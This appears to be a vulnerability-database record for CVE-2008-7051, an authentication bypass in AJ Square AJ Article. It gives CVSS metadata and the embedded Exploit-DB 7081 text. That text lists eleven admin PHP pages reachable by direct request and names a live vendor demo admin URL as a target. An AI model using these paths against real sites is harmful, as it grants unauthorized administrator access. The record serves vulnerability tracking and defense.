ID CVE-2008-7051
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:33:00
Description
AJ Square AJ Article allows remote attackers to bypass authentication and access administrator functionality via a direct request to (1) user.php, (2) articles.php, (3) articlesuspend.php, (4) site.php, (5) statistics.php, (6) mail.php, (7) category.php, (8) subcategory.php, (9) changepassword.php, (10) polling.php, and (11) logo.php in admin/.
{"id": "CVE-2008-7051", "bulletinFamily": "NVD", "title": "CVE-2008-7051", "description": "AJ Square AJ Article allows remote attackers to bypass authentication and access administrator functionality via a direct request to (1) user.php, (2) articles.php, (3) articlesuspend.php, (4) site.php, (5) statistics.php, (6) mail.php, (7) category.php, (8) subcategory.php, (9) changepassword.php, (10) polling.php, and (11) logo.php in admin/.", "published": "2009-08-24T10:30:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7051", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/7081", "http://www.securityfocus.com/bid/32254", "http://www.vupen.com/english/advisories/2008/3097"], "cvelist": ["CVE-2008-7051"], "type": "cve", "lastseen": "2019-05-29T18:09:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "6af6f2c96bfa685a1350d1227b6938ec"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "0731664ac1b0f29e4e3b7512f7cdb755"}, {"key": "cpe23", "hash": "5b35fd067f5f488dfcdb9b6dae139c87"}, {"key": "cvelist", "hash": "d40f8ce0c9c20d98fc6d4c01d6a6ccae"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "9725bf9e3870a4049c8e63b594766cf2"}, {"key": "description", "hash": "f90ab89e484c434c789b9457f970b2cb"}, {"key": "href", "hash": "2b7b6c3c96552f1e1b3bae291a5758d7"}, {"key": "modified", "hash": "8e68a47024ac52c01130d0c9914fccda"}, {"key": "published", "hash": "88b08ab34050e8e4715b6961b5fc2f52"}, {"key": "references", "hash": "843db638c1e8a038f7b798572358416d"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "a703792e66cb3ebbc778599cb5e56787"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "5f746ea08244c0f29186db25964f26f4df568dcdb0db2fa0f7b8b6bdf0ed0571", "viewCount": 0, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2019-05-29T18:09:30"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7081"]}], "modified": "2019-05-29T18:09:30"}, "vulnersScore": 7.1}, "objectVersion": "1.3", "cpe": ["cpe:/a:ajsquare:aj_article:*"], "affectedSoftware": [{"name": "ajsquare aj_article", "operator": "eq", "version": "*"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:ajsquare:aj_article:*:*:*:*:*:*:*:*"], "cwe": ["CWE-287"]}
{"exploitdb": [{"lastseen": "2016-02-01T01:21:57", "bulletinFamily": "exploit", "description": "AJ ARTICLE Remote Authentication Bypass Vulnerability. CVE-2008-7051. Webapps exploit for php platform", "modified": "2008-11-10T00:00:00", "published": "2008-11-10T00:00:00", "id": "EDB-ID:7081", "href": "https://www.exploit-db.com/exploits/7081/", "type": "exploitdb", "title": "AJ ARTICLE Remote Authentication Bypass Vulnerability", "sourceData": "==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n\n==============================================================================\n ____ _ _ _ _ ___ _ __\n / ___| | || | | \\ | | / _ \\ | |/ /\n | | _ | || |_ | \\| | | | | | | ' / \n | |_| | |__ _| | |\\ | | |_| | | . \\ \n \\____| |_| |_| \\_| \\___/ |_|\\_\\\n\n==============================================================================\n\tAJ Article Auth Bypass Vulnerability\n==============================================================================\n\n\t[\u00c2\u00bb] Script: [ AJ Article ]\n\t[\u00c2\u00bb] Language: [ PHP ]\n\t[\u00c2\u00bb] Website: [ http://www.ajsquare.com/products/article/ ]\n\t[\u00c2\u00bb] Type: [ Commercial ]\n\t[\u00c2\u00bb] Report-Date: [ 10.11.2008 ]\n\t[\u00c2\u00bb] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]\n\n\n===[ XPL ]===\n\t\n\t[\u00c2\u00bb] http://localhost/[path]/admin/user.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/articles.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/articlesuspend.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/site.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/statistics.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/mail.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/category.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/subcategory.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/changepassword.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/polling.php\n\t[\u00c2\u00bb] http://localhost/[path]/admin/logo.php\n\t[\u00c2\u00bb] ...\n\t\n\n\n===[ LIVE ]===\n\n\t[\u00c2\u00bb] http://www.ajsquare.com/products/demo/admin/\n\n\n\t\n===[ Greetz ]===\n\n\t[\u00c2\u00bb] ALLAH\n\t[\u00c2\u00bb] Tornado2800 <Tornado2800[at]gmail.com>\n\t[\u00c2\u00bb] Hussain-X <darkangel_g85[at]yahoo.com>\n\n\t//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\n\t//ALLAH,forgimme...\n\n===============================================================================\nexit();\n===============================================================================\n\n# milw0rm.com [2008-11-10]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7081/"}]}